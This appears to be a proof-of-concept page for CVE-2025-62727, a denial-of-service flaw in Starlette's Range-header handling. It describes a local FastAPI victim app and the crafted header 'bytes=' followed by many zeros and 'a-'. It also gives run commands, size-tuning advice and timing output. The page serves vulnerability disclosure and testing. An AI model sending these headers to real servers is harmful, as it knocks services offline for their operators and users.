CVE-2025-62727 PoC — Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse

Source

Associated Vulnerability

Description

Proof of concept of CVE-2025-62727 that can cause denial-of-service in FastAPI (based Starlette <= 0.48.0)

Readme

# CVE-2025-62727 Demo

## Victim Description

The target victim of CVE-2025-62727 is a simple FastAPI app that:

- Serves `Hello World` at `/`.
- Serves static files under `/static` using Starlette's `StaticFiles`.
- Auto-generates text files containing `A` repeated N times for N in `1024, 2048, 50176` on startup.

## How to run victim

1. (Optional) Create and activate a virtualenv.
2. Install dependencies:

   ```bash
   pip install -r requirements.txt
   ```

3. Start the server:

   ```bash
   uvicorn main:app --reload
   ```

4. Open:

- `http://127.0.0.1:8000/` for the index page.
- `http://127.0.0.1:8000/static/1024.txt` etc. for static files.

## Notes

- Static files are generated under the `static/` directory on app startup. Existing files are not overwritten.
- Static serving uses Starlette's `StaticFiles` as requested.

## PoC: CVE-2025-62727 (Range header parsing)

The included `poc.py` triggers CPU-heavy Range parsing in Starlette's `FileResponse` via the `/static` route using a crafted header of the form `bytes=000...000a-`.

Run the server, then in another shell:

```bash
python3 poc.py --sizes 1000,2000,4000,7000
```

Override the target URL (optional):

```bash
python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
```

Notes:
- The PoC targets `http://127.0.0.1:8000/static/50176.txt` by default (a file the app generates). Use `--url` to change it.
- Adjust `--sizes` downward if you see 400/431 (header too large), or upward if headers succeed and you want a stronger effect.

Result Exmaple:
```bash
$ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
[INFO] Target: http://127.0.0.1:8000/static/50176.txt
[MODE] regex (header = 'bytes=' + '0'*N + 'a-')
N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
```

File Snapshot

 [4.0K]  /data/pocs/fdc453a0dbc2d3a8be65621421d230cb4ae1fca3
├── [2.1K]  main.py
├── [2.3K]  poc.py
├── [2.0K]  README.md
├── [ 431]  requirements.txt
└── [4.0K]  static
    ├── [ 10K]  10240.txt
    ├── [1.0K]  1024.txt
    ├── [ 11K]  11264.txt
    ├── [ 12K]  12288.txt
    ├── [ 13K]  13312.txt
    ├── [ 14K]  14336.txt
    ├── [ 15K]  15360.txt
    ├── [ 16K]  16384.txt
    ├── [ 17K]  17408.txt
    ├── [ 18K]  18432.txt
    ├── [ 19K]  19456.txt
    ├── [ 20K]  20480.txt
    ├── [2.0K]  2048.txt
    ├── [ 21K]  21504.txt
    ├── [ 22K]  22528.txt
    ├── [ 23K]  23552.txt
    ├── [ 24K]  24576.txt
    ├── [ 25K]  25600.txt
    ├── [ 26K]  26624.txt
    ├── [ 27K]  27648.txt
    ├── [ 28K]  28672.txt
    ├── [ 29K]  29696.txt
    ├── [ 30K]  30720.txt
    ├── [3.0K]  3072.txt
    ├── [ 31K]  31744.txt
    ├── [ 32K]  32768.txt
    ├── [ 33K]  33792.txt
    ├── [ 34K]  34816.txt
    ├── [ 35K]  35840.txt
    ├── [ 36K]  36864.txt
    ├── [ 37K]  37888.txt
    ├── [ 38K]  38912.txt
    ├── [ 39K]  39936.txt
    ├── [ 40K]  40960.txt
    ├── [4.0K]  4096.txt
    ├── [ 41K]  41984.txt
    ├── [ 42K]  43008.txt
    ├── [ 43K]  44032.txt
    ├── [ 44K]  45056.txt
    ├── [ 45K]  46080.txt
    ├── [ 46K]  47104.txt
    ├── [ 47K]  48128.txt
    ├── [ 48K]  49152.txt
    ├── [ 49K]  50176.txt
    ├── [5.0K]  5120.txt
    ├── [6.0K]  6144.txt
    ├── [7.0K]  7168.txt
    ├── [8.0K]  8192.txt
    └── [9.0K]  9216.txt

2 directories, 53 files

Remarks